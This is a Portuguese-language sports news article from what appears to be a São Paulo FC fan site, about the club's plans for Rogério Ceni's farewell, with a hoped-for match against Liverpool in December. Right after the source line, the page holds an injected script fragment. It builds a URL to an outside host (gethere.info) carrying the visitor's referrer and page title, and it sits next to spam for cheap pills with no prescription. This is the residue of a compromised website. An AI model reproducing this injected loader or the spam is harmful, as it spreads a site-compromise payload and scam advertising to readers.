Destaque Noticia

São Paulo sonha com Liverpool para adeus de Ceni, mas analisa opções

Em meio aos preparativos para a aposentadoria de Rogério Ceni, o São Paulo traça o plano de eventos para se despedir do ídolo. E o sonho é claro: uma partida contra o Liverpool, em dezembro, no Morumbi. O Tricolor, no entanto, sabe da dificuldade de poder trazer o time inglês para o Brasil e, por isso, analisa alternativas.

Depois da partida entre Ceni e torcedores, na noite de sexta-feira, Douglas Schwartzmann, vice-presidente de marketing do São Paulo, admitiu o interesse na partida contra o Liverpool. Assim, relembraria o principal título de Ceni pelo clube, o título mundial de 2005, diante do clube inglês. Ele, no entanto, sabe que o plano não é fácil. Por isso, analisa outras possibilidades.

– Existe a ideia. Não é tão fácil reunir jogadores de fora do país em um período em que não estejam em pré-temporada. Existe um custo alto. Temos a vontade. Juntar os dois times de 2005 seria um sonho. Se a gente conseguisse, seria em dezembro. Não descartamos a ideia de trazer o Liverpool, mas outros clubes também se ofereceram. Tem o Tenerife (rival na partida de estreia de Ceni), tem o Milan. Temos a possibilidade de fazer jogo com amigos dele, outros ídolos. Vamos ver quais são as opções rentáveis, alegres e viáveis – afirmou.

Schwartzmann diz ter pronto um plano de eventos e ações de marketing para a despedida do ídolo. A ideia é apresentar as propostas a Ceni nos próximos dias para definir o calendário até o fim do ano.

– Vamos apresentar ao Rogério todas as ações. Todos os jogos, se possível, serão no Morumbi. Em algumas ações, temos um custo, precisamos ter parceiros. Fechamos parceria com o time americano (Tampa Bay Rowdies), queremos trazer eles aqui, se possível. A Copa Airlines (empresa de aviação panamenha) é uma grande parceira, e o Governo do Panamá tem a ideia de promover o turismo. Pode ser que tragam a seleção ou algum time de lá. Temos uma série de eventos que não estão finalizados, mas serão feitos para tornar essa despedida eterna. Ele é um mito. Tanto que a gente brinca e diz que nosso plano de ação se chama mitologia.

Rogério também espera o planejamento que vai marcar seus últimos meses com a camisa do São Paulo.

– Ainda não tenho certeza como vai ser. Pode ser que tenhamos um novo jogo com torcedores em dezembro. Temos detalhes ainda para acertar. Esperamos que possamos fazer coisas diferentes, bacanas. E que todos possam ter um acesso maior, mais próximos. Até porque vou mudar meu status – brincou.

Ceni tem a presença no clássico contra o Palmeiras praticamente certa neste domingo. O São Paulo encara os rivais na arena alviverde, às 16h.

Fonte: Ges.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; put in cart inexpensively drugs no prescription cheap pills

View Comments (1)

1 Comment

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

dezesseis − oito =

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.

Destaque Noticia

Mais em Destaque Noticia

Sul-Americana, Copa do Brasil ou Brasileirão: qual torneio se dedicar?

saopauloadmin20 de outubro de 2020

São Paulo vive a sua maior sequência sem derrotas na temporada mas só venceu 2 dos últimos 11 jogos

saopauloadmin19 de outubro de 2020

São Paulo: Diniz afirma que arbitragem contra Fortaleza foi ‘confusa’

saopauloadmin15 de outubro de 2020

Veja o que mudou no SPFC desde o adeus na Libertadores

saopauloadmin13 de outubro de 2020

Fernando Diniz supera pressão e segue com duas pedras no caminho: Palmeiras e Rogério Ceni

saopauloadmin8 de outubro de 2020

Juanfran sente joelho na primeira etapa e vira preocupação para o São Paulo

saopauloadmin8 de outubro de 2020

Fernando Diniz lida com dúvida na lateral direita

saopauloadmin4 de outubro de 2020

Após eliminação na Libertadores, Raí banca Diniz no São Paulo

saopauloadmin1 de outubro de 2020

São Paulo é perde para o River Plate e está eliminado da Libertadores

saopauloadmin1 de outubro de 2020